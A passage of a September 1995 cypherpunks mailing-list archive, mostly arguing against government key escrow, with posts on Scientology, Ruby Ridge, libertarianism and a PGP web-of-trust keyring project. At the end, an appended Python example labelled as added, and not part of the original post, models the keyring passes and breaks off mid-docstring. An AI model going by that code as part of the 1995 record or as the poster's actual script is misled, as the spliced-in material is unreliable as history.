compatriots developed and used secret codes for communications. No doubt
King George would have found GAK quite useful.

No, the point is really about whether people may speak and write in the
languages they wish, or be ordered to speak and write in ways the
government can monitor, with or without the "speed bump" of  key escrow and
court orders to release the escrowed keys.

(Ironically, I just heard about a case in Texas where a judge ordered a
mother to stop speaking in Spanish to her child at home, calling it "child
abuse." The implications of this are self-evident.)

"Escrow" of communications keys, when commanded by the government, is no
different than requiring that all locks have duplicate keys "escrowed" with
the police, or that all curtains and window shades have a special
"invisibility mode" that "law enforcement" can enable under certain
circumstances.

"Key escrow," or GAK, is to most of us equivalent to universal wiretapping.
Why not tape-record all calls and "escrow" the result? Why not mount
surveillance cameras in homes and "escrow" the result? All are essentially
equivalent.

The pernicious nature of the "escrow" idea, which I have to admit is a new
twist on the surveillance state that was not anticipated by Orwell,
Brunner, or any of the other writers on this topic, is that it says that
surveillance is not so bad after all, because the results of the escrow
will not be looked at except when "justified." By whom? And by what
conceivable right can the government tell me I may not use the
communication system and language of my choice?

I have no doubt that such key escrow, or recording of all calls, or
surveillance cameras, with escrowed results, would "stop" some crimes.
Maybe even some serious crimes, even horrific crimes.

So what? In a free society, we don't tell people what language they may
speak in, and with whom, nor do we place microphones and cameras in their
presence, even if we "escrow" the results and promise not to look unless a
judge or a review panel says it's OK. There are undoubtedly crimes that
would be stopped if surveillance cameras were placed in many places,
private and public, with "video escrow."

Friends of mine are developing micropower, tiny, ultrawideband radio
"localizers," that could be used by parents to keep track of children,
pets, luggage, etc. I have long joked with them about "position escrow,"
where the government will mandate that all citizen-units wear these devices
(or have them implanted) so that their positions can be monitored. Would an
"escrow" system make it any less unacceptable? The arguments for "position
escrow," once the technology becomes available (surely by 1998-9) are very
similar to those being made for communications escrow. Lots of crimes would
be solved, and even OJ might be convicted, if a court could order the
"position escrow" files opened. So what? That's now what a free society is
about.

The basic principle is the issue.

There are other problems with key escrow, involving such things as how
persistent the access keys will be (will a court order reveal past
communications not covered by the order?), who will have access, etc. These
are the things the government _wants_ us to focus on, as these can probably
be fixed by sufficiently elaborate protocols...sort of.

But the core issue is not being addressed, the core issue of surveillance
and the government's plan to order us to speak only in certain approved
modes.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: H Keith Henson <hkhenson@shell.portal.com>
Date: Thu, 7 Sep 95 10:25:07 PDT
To: cypherpunks@toad.com
Subject: PGP key disclosure
Message-ID: <199509071723.KAA02608@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain



[included msg]

i've been told that larry wollersheim refuses to give up his 
de-encryption key to Co$, and will go to jail before he does.

this is ok to post. i can't post yet, due to technology transfer 
happening here at the usf.edu

--------------------------------------m. council, human being
Hell, if you understood
everything I say, you'd              council@luna.cas.usf.edu
be me.     -Miles Davis

[end included msg]

I am off cypherpunks at the moment, so if there are any followups
to this, please send me email.  Thanks, Keith Henson




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ian Goldberg <iang@cory.EECS.Berkeley.EDU>
Date: Thu, 7 Sep 95 10:24:15 PDT
To: cypherpunks@toad.com
Subject: How to get to Saturday's meeting in SF?
Message-ID: <199509071724.KAA00396@cory.EECS.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


I'd like to go to the meeting on Saturday in SF, but I need instructions
on how to get there by public transit from the Berkeley campus.
(Alternatively, is anyone going that may be able to give me a lift?)

Thanks,

   - Ian



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 7 Sep 95 10:22:39 PDT
To: cypherpunks@toad.com
Subject: Crypto Anarchy and Virtual Communities
Message-ID: <ac7478e02602100408bb@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:15 PM 9/7/95, Duncan Frissell wrote:
>At 09:20 PM 9/6/95 -0500, Mac Norton wrote:
>>Well, scratch me deeply enough, I'm not sure I'd disagree
>>with Tim, "philosophically speaking."  The problem is, as
>>all the truly wise philosophers recognized, we must live
>>in the world.  And given the number of us who must do so,
>>that entails rules.
>
>That's what's so nice about the nets.  You don't (won't) have to "live in the
>world" any more.  The creation of consensual hallucinations (virtual worlds)
>allows you to "change the world" at will.
>
>And once the interface improves...
>
>Actually, the creation of separate "spaces" that can only be entered with
>your (each person's) permission will have a big impact on life in the real
>world.

I of course agree strongly with Duncan.

We don't often talk about this aspect, as it was all hashed-over a couple
of years ago, and most newcomers to the list do not seem as interested as
we were. (And, it has little to do with coding in C  :-})

Those interested might want to look at the very long chapter on "Crypto
Anarchy" in my Cyphernomicon, or my paper, "Crypto Anarchy and Virtual
Communities."

Or read "True Names" and "Snow Crash" and think about what happens when the
stuff we talk about is added. (Hint: Hiro Protagonist would not be "vastly
wealthy" in the Metaverse but poor in the Real World (tm).)

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Saitmacher, Klaus, Dr., DyStar"      <Saitmacher@MSMDSTTF.frankfurt.hoechst-ag.d400.de>
Date: Thu, 7 Sep 95 01:26:57 PDT
To: Cypher <cypherpunks@toad.com> (Receipt Notification Requested) (Non Receipt    Notification Requested)
Subject: subscripe
Message-ID: <000C8D27.MAI*/S=Saitmacher/OU=MSMDSTTF/O=FRANKFURT/PRMD=hoechst-ag/ADMD=dbp/C=de/@MHS>
MIME-Version: 1.0
Content-Type: text/plain



subscripe




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zinc <zinc@zifi.genetics.utah.edu>
Date: Thu, 7 Sep 95 09:49:06 PDT
To: Patrick Horgan <patrick@Verity.COM>
Subject: Re: Scientology and police visit XS4ALL Amsterdam
In-Reply-To: <9509071507.AA08037@cantina.verity.com>
Message-ID: <Pine.LNX.3.91.950907104256.5239H-100000@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 7 Sep 1995, Patrick Horgan wrote: 

> Date: Thu, 7 Sep 1995 08:07:39 -0700
> From: Patrick Horgan <patrick@Verity.COM>
> To: cg@bofh.lake.de, mark@lochard.com.au
> Cc: cypherpunks@toad.com
> Subject: Re: Scientology and police visit XS4ALL Amsterdam
> 
> > My personal view is co$ deserves all the flak they get.
> 
> I know who you're referring to by saying co$, but what do co$ mean?
> Co-DollarSign?  Co-Dollar?
> 

CO$ is _C_hurch _O_f _$_cientology

L. Ronboy the telepath Hubbards biggest joke.

- -pjf



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBME8hqE3Qo/lG0AH5AQGFkAQAikXaF7nCJ99+XBONXKcvBTO7lMZn+wEZ
l9+YZOI6QLZNY/f/HB5mOorwn340lgED0y/RjoT9ctoXwVW9bNSZZ68lQm7k72wO
Ymz1NxHfwQRq8FNiUZnKmz+Wb/YHpAwGhvvPfocA+rLupdd9x/9BSm047RDgwgvX
MVEx4B5C8wI=
=ot1t
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David J. Bianco" <bianco@itribe.net>
Date: Thu, 7 Sep 95 07:46:24 PDT
To: cypherpunks@toad.com
Subject: Cryptography Technical Report Server (CTRS) needs submissions!
Message-ID: <199509071442.KAA03274@gatekeeper.itribe.net>
MIME-Version: 1.0
Content-Type: text/plain


Earlier this week I posted a note bemoaning the lack of a good
searchable repository for cryptography related technical reports.
In short, I volunteered to develop, host and maintain such a system
as a service to the rest of the Internet.  The system is ready, now
the fun part begins...

The Cryptographic Technical Report Service needs *YOU*. Specifically,
it needs your technical reports (or other technical documentation).
In order for CTRS to become popular, it needs to have a useful amount
of data to search, so I'm currently soliciting submissions for the
database.

Contributing to CTRS is pretty simple.  Detailed information can be
found at <http://porthos.itribe.net/CTRS/FAQ.html#contribute>, but
basically all that's required is to send <ctrs-submissions@itribe.net>
a refer-format bibliographic entry which contains a URL pointing to
the paper's real Net location.  I'll index the entries (prettyprinting
them, of course), and CTRS users will follow that URL if they want to
retrieve the paper.  If you don't have a URL, I'm willing to host as
many papers as I have resources for.  Full details can be found at the
URL above, but please note that I'm only able to accept papers
submitted by the authors (or copyright holder).

If you'd like to know more about CTRS, you can check out its beta
version at <http://www.itribe.net/CTRS/>
(<https://www.itribe.net/CTRS/> for the SSL version).  The database
doesn't have much (anything) in it right now, so I'm relying totally on
submissions in order to build the collection.

I firmly believe that CTRS can provide a useful service to the
cryptographic community, so I hope you will all consider contributing
your reports to CTRS.  If you have questions, please check out the
CTRS FAQ <http://www.itribe.net/CTRS/FAQ.html>.  If you still have
questions, feel free to contact me at the email address below.

==========================================================================
David J. Bianco			| Web Wonders, Online Oddities, Cool Stuff
iTribe, Inc.			|
Suite 1700, World Trade Center	| email: <bianco@itribe.net>
Norfolk, VA 23510		| URL  : http://www.itribe.net/~bianco/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 7 Sep 95 10:34:48 PDT
To: cypherpunks@toad.com
Subject: Why Key Escrow (GAK) is So Bad
Message-ID: <ac747c2227021004cc7a@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


I wrote:

....
made for communications escrow. Lots of crimes would be solved, and even OJ
might be convicted, if a court could order the "position escrow" files
opened. So what? That's now what a free society is about.
....

This last line has a typo. What I meant to say was:

"That's not what a free society is about."

Normally I don't post minor corrections, but this one needs correcting.

--Tim


---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 7 Sep 95 08:34:01 PDT
To: cypherpunks@toad.com
Subject: Force Ratios
Message-ID: <199509071447.KAA28579@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


Wednesday night's ABC magazine program on Ruby Ridge was a great example of
what TV can be but so rarely is.  Lots of chopper shots of Ruby Ridge.  Lots
of hand held camera recreations and interviews with the Weavers and the
sniper (face obscured because he has something to hide), etc.

But the most interesting thing that this emphasized for me was the sort of
modern information warfare issues as highlighted in the recent Economist
Survey.  Info war is war by other means (a little shooting, communications,
publicity, and litigation) and look what happened at Ruby Ridge.  The Feds
deployed 400 "troopies", some armored personnel carriers, copters, executive
jets, Hummers, and other hardware.  On the other side were 3 adults and 4
children with some 14 personal weapons.

The result.  One Fed and two Weavers dead.  A $3.1 million legal settlement,
and continuing problems for the Feds.  That smells like a bad defeat to me.
They couldn't even kill 7 people with a 57 to 1 force ratio.  

In addition, the operation and the various investigations must have cost the
Feds millions more.  (What *do* the Fibbies have to pay for those Ninja
Hoods?)  And they lost.

That suggests that the ability of The Great Enemy to overcome the sort of
directed human activity of the frictionless markets we are building will be
quite limited.

DCF

"Your Honor, the Defense will rest without calling any witnesses.  No
witnesses we could put on the stand could do as good a job setting forth the
Defense case as the Government's witnesses have already done." -- Gerry
Spence at the conclusion of the Government's case in US vs. Weaver.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjm@ionia.engr.sgi.com (Patrick May)
Date: Thu, 7 Sep 95 11:05:58 PDT
To: Brian Davis <bdavis@thepoint.net>
Subject: Re: GAK
In-Reply-To: <ac6cea0f00021004158f@[205.199.118.202]>
Message-ID: <199509071805.LAA12656@ionia.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


Brian Davis writes:
 > I, of course, know of the "dislike" of GAK here.  I am curious to know, 
 > however, if the "dislike" is because government would have access under 
 > any circumstances or if the primary worry is that government will cheat 
 > and get access when most would agree that they shouldn't (either by the 
 > judge "cheating" or a TLA stealing it).

     Since you're sure to get a number of long responses to this
question, I'll keep mine short.

     I don't want to give anyone my keys.  I do not harm anyone by
refusing to do so.  Therefore, anyone using force to take my keys is
acting immorally.*

 > In other words ... if it took agreement by a review board composed of 
 > non-LEA members of this list, would the escrow be acceptable??

     No.  I don't choose to give Louis Freeh my keys.  I don't choose
to give Brian Davis my keys.  I don't choose to give Tim May my keys.
Any use of force to compel me to yield my keys is unacceptable.

Regards,

Patrick May

* Insert standard Objectivist and Libertarian arguments regarding
  morality, government, and force here.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjm@ionia.engr.sgi.com (Patrick May)
Date: Thu, 7 Sep 95 11:05:49 PDT
To: Brian Davis <bdavis@thepoint.net>
Subject: Re: GAK
In-Reply-To: <ac6cea0f00021004158f@[205.199.118.202]>
Message-ID: <199509071805.LAA12805@ionia.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Brian Davis writes:
 > I, of course, know of the "dislike" of GAK here.  I am curious to know, 
 > however, if the "dislike" is because government would have access under 
 > any circumstances or if the primary worry is that government will cheat 
 > and get access when most would agree that they shouldn't (either by the 
 > judge "cheating" or a TLA stealing it).

     Since you're sure to get a number of long responses to this
question, I'll keep mine short.

     I don't want to give anyone my keys.  I do not harm anyone by
refusing to do so.  Therefore, anyone using force to take my keys is
acting immorally.*

 > In other words ... if it took agreement by a review board composed of 
 > non-LEA members of this list, would the escrow be acceptable??

     No.  I don't choose to give Louis Freeh my keys.  I don't choose
to give Brian Davis my keys.  I don't choose to give Tim May my keys.
Any use of force to compel me to yield my keys is unacceptable.

Regards,

Patrick May

* Insert standard Objectivist and Libertarian arguments regarding
  morality, government, and force here.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBME80YO5Yg08fDKehAQEoqAP/QWcvU4xu4qQNw7S6RNPQ+zCmGzh+B/7r
G/490EMOKifsraaDYmh0WRBJ7+2rr+sWuvwpnJzVhRPcR1Mhzz/ZbNjrIm5wFhDH
/Yrkln3oZ8iIKgvvwrw75krBG511CHvHg0OudYsxuuP10pgQaT59uQF0bod1plY0
zpao6in3ZKI=
=QxbQ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 7 Sep 95 10:55:19 PDT
To: cypherpunks@toad.com
Subject: GAK Hacks
Message-ID: <ac747fdf2a021004ad80@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:43 PM 9/7/95, Matthew Ghio wrote:

>The same applies to GAK.  There is no reason to hack it when you can just
>use PGP instead.  The only reason to hack it would be if it became a
>standard.  If we have to start hacking GAK applications, we've already
>lost to a degree.  Thus our focus should be on making alternatives
>available instead of just attacking GAK.  (Although I suppose you could
>show how to hack it, for the sake of making a political statement.)

GAK Hacks!

We did it for SSL, let's do it for GAK.

Demonstrate that superencryption (encrypting within a GAK wrapper) defeats
GAK. And other kinds of hacks, including releasing "damaged" (inoperative)
versions of the proposed code (when it becomes available).

Or releasing "work-alikes." Etc.

Granted, the demonstrations will be less clear than breaking the 40-bit key
was, partly because there is no clear-cut standard out there, and many
aspects of GAK are still in flux.

But it could still be a powerful example, an example "by direct
demonstration," that government-mandated key escrow is problematic.

(Of course, a sufficiently powerful or clear demonstration, picked up by
the popular press the way the SSL challenge was, could also cause the
government to tighten up the rules on GAK, such
as--speculatively!!!!--adding "compliance audits" to the GAK laws.)

But GAK Hacking could be an interesting project.

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Thu, 7 Sep 95 08:23:13 PDT
To: cypherpunks@toad.com
Subject: Re: Notes from NIS&T Key Escrow Export conference.
Message-ID: <9509071523.AA12261@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>The last issue in the session was that the length of the key, 64-bits,
>was defined in criteria #1. There was no discussion at the conference on
>this criteria. It seems that the NIS&T and NSA folks believe that this is a
>closed topic. The folks in the session did not agree. They felt that 64-bits
>was not enough.

I hope this gets to you before the conference is over. I would REALLY
like to hear the government response to the question:

"If keys are escrowed, what purpose does a 64 bit limit serve?"

Secondarily, I observe that this apparently precludes the use of OTP.

Peter Trei
ptrei@acm.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Thu, 7 Sep 95 08:39:14 PDT
To: cypherpunks@toad.com
Subject: Re: ECPA (Was: University logging mail to anon.penet.fi)
Message-ID: <199509071535.LAA49458@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

"Josh M. Osborne" <stripes@va.pubnix.com> writes:

<snip>

>Even if we were in a more libertarian society you run the risk of
>being boycotted by potential customers (of corse the analagy breaks
>down somewhat, in a very libertarian society oyu might be able to
>run a profatable ISP selling to the very nich market of people who
>want to threten, harass, or generally make a nuicence of themselves).
>

As the list's designated "very libertarian" advocate, I must object.
Here is what you must sign to become a member of the Libertarian Party:

"I hereby certify that I do not believe in or advocate the initiation of
force as a means of achieving political or social goals." Libertarian
Pledge required for membership.
       <signature>___________________________.

To "to threten, harass, or generally make a nuicence"[SIC] of himself,
one must violate this pledge, and there would no-doubt still be legal
results. This points up the difference between libertaria (not utopia)
and anarchy. Anything _DOESN'T_ go in libertaria. If you see a victim,
there's almost certainly a crime, and if someone chose to threaten,
harass, etc. me, I would want it so. Of course, there are exceptions.

For example: If I join a mailing list which sometimes "harasses" me
due to insufficient spell-checking/proof-reading of certain posts,
there might still be the common-law defense that Jim Ray "came to the
nuisance," and therefore I am still not due any compensation.<g>
I can always unsubscribe, and some people probably wish I would. ;)
[NOTE: IANAL!]
JMR
<snip>


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBME8RWm1lp8bpvW01AQHXVgP9GsUelVcy4BFo/qt+Gm2JqdaHOlGUAvnP
eFWXXT7hhzuC5Lz7vdBOb7itNGVahOVmDWPZxAbGJd/sJtd7YAfn4I8uMCiFieXZ
dG7atBLLB66tBcsLYq/gXABHg2Z+MMojTf8A5XXCdqCJl4KoeaVckOEnKjR6uoCE
Q9WrJiykH8Y=
=xdDV
-----END PGP SIGNATURE-----
Regards, Jim Ray

"As sensitive and broad-minded humans, we must never allow ourselves to
be in any way judgmental of the religious practices of other people,
even when these people clearly are raving space loons." -- Dave Barry
------------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35  James M. Ray  <liberty@gate.net>
------------------------------------------------------------------------
Support Phil! email zldf@clark.net or see http://www.netresponse.com/zldf
________________________________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ghio@cmu.edu (Matthew Ghio)
Date: Thu, 7 Sep 95 08:59:59 PDT
To: cypherpunks@toad.com
Subject: Re: Another Son of Clipper discussion paper
In-Reply-To: <v02120d08ac72acec4bb0@[192.0.2.1]>
Message-ID: <m0sqj7T-0012qWC@myriad>
MIME-Version: 1.0
Content-Type: text/plain


Mike McNally (m5@dev.tivoli.com) wrote:
: Lucky Green writes:
:  > Windows 95 is on a lot of people's hard drives. It is therefore public
:  > and available for every one's inspection.  How many people do you know
:  > that have reverse engineered Windows 95. How many of those use a
:  > reverse engineered version. I'd venture it is zero out of zero.
:
: Problems with this analogy:
:
: 1) Windows 95 is somewhat bigger than your typical encryption
: routine;
:
: 2) The factor of motivation isn't considered.

If one is motivated enough to want source code to their operating system,
then they are motivated enough to dump Windows and download Linux or BSD.
The only reason to reverse-engineer Windows 95 is to produce applications
which are able to interoperate with Windows software in an unintended
manner, and the only reason to want to do this (instead of writing a
version for an open platform) is because Windows is standard on many PCs.

The same applies to GAK.  There is no reason to hack it when you can just
use PGP instead.  The only reason to hack it would be if it became a
standard.  If we have to start hacking GAK applications, we've already
lost to a degree.  Thus our focus should be on making alternatives
available instead of just attacking GAK.  (Although I suppose you could
show how to hack it, for the sake of making a political statement.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Thu, 7 Sep 95 08:50:22 PDT
To: cypherpunks@toad.com
Subject: Re: ON OFF-TOPIC
In-Reply-To: <199509070639.BAA00416@mail.socketis.net>
Message-ID: <9509071545.AA05172@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain




>     THE UNITED STATES "FEDERAL" GOVERNMENT HAS NO LEGITIMACY!

Of course not, but I don't think that the 1776 result is up for review.

This isn't about crypto nor about the social effects of crypto. It's just another 
looney conspiracy theory.


	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Thu, 7 Sep 95 09:10:00 PDT
To: cypherpunks@toad.com
Subject: Re: Cybersecurity
In-Reply-To: <199509071329.JAA06512@panix.com>
Message-ID: <9509071605.AA05479@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>It was very much on the side of those seeking privacy, presenting
>the government (even in the UK they are looking at mandatory key escrow, but
>they haven't exactly told British subjects about it) as being underhand,
>sneaking around to find ways of removing the privacy of the individual. 

The UK government looks at many things. Just because the US govt wants to do 
something daft and the UK wants to watch does not mean the UK wants to emulate 
it.

The UK Labour party is opposed to key escrow "we do not accept the "clipper 
chip" argument". The Tories have less than half the level of popular support and 
are barely recognisable as a government.

	Phill



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 7 Sep 95 09:17:12 PDT
To: Mac Norton <mnorton@cavern.uark.edu>
Subject: Re: Collection of personal info
Message-ID: <199509071616.MAA04473@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:20 PM 9/6/95 -0500, Mac Norton wrote:
>Well, scratch me deeply enough, I'm not sure I'd disagree 
>with Tim, "philosophically speaking."  The problem is, as
>all the truly wise philosophers recognized, we must live
>in the world.  And given the number of us who must do so,
>that entails rules.

That's what's so nice about the nets.  You don't (won't) have to "live in the
world" any more.  The creation of consensual hallucinations (virtual worlds)
allows you to "change the world" at will.

And once the interface improves...

Actually, the creation of separate "spaces" that can only be entered with
your (each person's) permission will have a big impact on life in the real
world.   

DCF

"If you don't want TRW to know what you're doing, lie."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Contois <mark@lenox.com>
Date: Thu, 7 Sep 95 09:31:21 PDT
To: bdavis@thepoint.net (Brian Davis)
Subject: Re: GAK
In-Reply-To: <Pine.D-G.3.91.950903212120.8430B-100000@dg.thepoint.net>
Message-ID: <199509071628.MAA07681@tempest.lenox.com>
MIME-Version: 1.0
Content-Type: text


> In other words ... if it took agreement by a review board composed of 
> non-LEA members of this list, would the escrow be acceptable??
> 
> EBD

Speaking for myself only, of course, mandatory key escrow under *any*
circumstances is a Bad Thing.  I don't want anyone to have my secret
key/passphrase, even if 'anyone' consists of n respected cypherpunks.
(How are we supposed to tell whether they're LE, anyway?  I possess
a high degree of confidence, for example, that Tim May is not an
undercover spook.  But that doesn't stop various tentacles^H^H^H^H^H^H^H^H^H
anonymous posters from expressing assertions to the contrary.)

If I *give* my key to an escrow agent, of course, that's a different
story.  ("Mr. Cheatem, in the event of my death or disappearance, please
decrypt this file with the enclosed key and fax it to the Washington
Post.")  But I certainly don't want to allow my key to reside with an
agent who could be forced to turn it over on the basis of a court order.

Sorry if I'm repeating an earlier discussion.

Mark

-- 
Mark Contois * The Lenox Group * Boston, MA * http://www.lenox.com/~mark/
Finger for PGP public key * Stellar Crisis: http://www.lenox.com/games/sc
Cypherpunks: Share and deploy ********* NSA: Go stick your head in a pig.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: don@cs.byu.edu
Date: Thu, 7 Sep 95 19:58:18 PDT
To: cypherpunks@toad.com
Subject: Announce: Web of Trust Ring
Message-ID: <199509071832.MAA00480@wero.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

WEB OF TRUST KEYRING GENERATION PROJECT

I have completed my project to make a condensed version of the keyserver
PGP keyrings, containing only the "web of trust" inter-related keys. My
methods were rather crude, and unfortunately only extracted those people
who have signed someone (already on the list) else's key. That means that
people who are well connected on the web of trust are included, while
those people who only receive signatures from well-connected people are
not included.

The keyfile is approximately 1 megabyte, as opposed to 5-6 in the
keyservers. Building it required 12 successive passes to the MIT keyring,
each requiring 4-6 hours on my poor 386. I also made a subsequent pass
using the UNIMI keyring. To seed the list I used warlord@mit.edu (Uh
Derek? Hello??) and those keynumbers that cpunks mailed me. (Unfortunately
some people sent only their key blocks, which I didn't use. Also, my
server "lost" mail _twice_ due to "disk crash" while I was collecting key
numbers.) I assume that requiring 13 passes means that the longest
possible chain with a single connection (not necessarily a trust
connection) to one of the seed keys is 12 keys. 

All included keys are exactly as they are on keyservers. The keyring
can be trivially validated as much as possible simply by validating
one of the well-connected keys, like the ones that come with PGP. Warning:
not responsible for assigning trust levels for all those people. That's
your job. Have fun.

Why did I do this:

1) Because I wanted to.
2) Because I really had nothing better to do with my CPU time.
3)

wait, wait, ok for reals:

1) Because I want a web of trust keyring for myself, and that big old
   5+ meg clunker keyfile is tooooo slow to use. 
2) Because I feel that a DNS-style keyserver would not suit many
   web-of-trust activities that I wanted the keyring for, IE: pgp aware
   tools like news and mail readers for on-the-fly validation.
3) Because I feel that a system like this would encourage strengthening
   the web-of-trust, ie, trusting the KEYS. The current system has a 
   lot of disjointed keys (uh, 4 meg worth I guess, eh?) which I found
   myself trusting simply because they were on the Keyservers. While
   this facilitates creation of a stable nym(*), real or not, I found
   myself even trying to justify to others trusting a key simply because
   it was on a keyserver. 

* = I agree with Bill Steward that we are a bit obsessed on True Names(tm)
    bit. I understand when Someone(tm) like Derek Atkins wants to see a
    True Name ID card(tm), but I'm sympathetic to having Nym signing, with
    the problem to overcome being simply the man-in-the-middle thwarting.


Updates:

Currently I am not really planning to do much in the way of updates to
this, unless people actually are interested in updates. To be frank,
this keyring is what I'm dropping into my own PGP, other than that it's
not too exciting. 

If you get a copy, please tell me what you think of the project. The
location is ftp to bert.cs.byu.edu, pub/donring.pgp.  Unfortunately I
don't know if you can tack that together as a ftp:// address. If you do,
try ~ftp/pub/donring.pgp for good measure. 

I have suggested in the past that keyserver software could be modified to
update the web of trust (using a keyfile such as mine for a base) instead
of accepting just any key. I am not capable of making such modifications
to the keyserver program, nor do I know of a keyserver operator who is
willing to run such a system. A "for real" web of trust keyserver would
want to fully expand my keyring by adding what I left out - those keys who
are signed by included keys, but are not themselves included because they
were not a seed and have not signed an included key. Having coded that, an
update system that checks for a relation to an already-included key would
be trivial. 

A second issue is that "The Web" of trust depends on the keys used to seed
it. It's very possible that many of unimi's (for example) key file (500k
bigger than MIT) keys do not have signatures connecting them to the people
who came out with PGP, but have a robust web of trust none the less. 
Unless the project can obtain a seed which connects to that web, none of
it is included. However, as I stated, that is a fact which will 
_encourage_ people to seek each other out for key signing.

I suppose I could also make a list of the keyring generation script, if
anyone actually wanted to ftp it. It would take between 15 and 35 hours to
run on a 386 Linux box such as mine, mere hours on a big, fast box. There
is really no need for it except to regenerate the keyring, for paranoia
purposes or other reasons. 

Don

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBME6dqsLa+QKZS485AQFiBwL/boAb6BOdvcVHVyV+rGRmMTNk8iibcXvX
kdngbRLrBEc2r4pJkuNpDvT2M/GmmGEGYxiAXKV9LDmWa7RLnCicjidP1RJVcu+3
xtVeO9PF+4ZecgEUJl4j6JdPEE52guOr
=nm0W
-----END PGP SIGNATURE-----
<don@cs.byu.edu>           fRee cRyPTo!   jOin the hUnt or BE tHe PrEY
PGP key - http://bert.cs.byu.edu/~don     or PubKey servers (0x994b8f39)
  June 7&14, 1995: 1st amendment repealed.  Death threats ALWAYS pgp signed
* This user insured by the Smith, Wesson, & Zimmermann insurance company *
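
An added example, not part of the original post and not Don's script: a small Python model of the keyring-condensing passes the announcement describes, plus the one-step expansion and the update check it says a "for real" web-of-trust keyserver would need. The key IDs and signature graph are constructed placeholders, and treating each pass as a snapshot of the previous one is an assumption.

```python
"""Model of the web-of-trust keyring passes described in the post (added example)."""

# Constructed sample data: signer -> set of key IDs that signer has certified.
# Every key carries a self-signature. None of these IDs are real keys.
SIGNATURES = {
    "SEED": {"SEED", "A", "E"},
    "A": {"A", "SEED", "B"},
    "B": {"B", "A"},
    "C": {"C", "B", "F"},
    "E": {"E"},            # signed by SEED, has signed nobody else
    "F": {"F"},            # signed by C, has signed nobody else
    "G": {"G"},            # self-signed only
    "X": {"X", "Y"},       # X and Y form an island with no link to SEED
    "Y": {"Y", "X"},
}


def signers_closure(signatures, seeds):
    """Repeat passes over the keyring, adding every key that has signed a
    key already included, until a pass adds nothing.

    Returns (included_keys, keys_added_per_pass). Each pass only sees the
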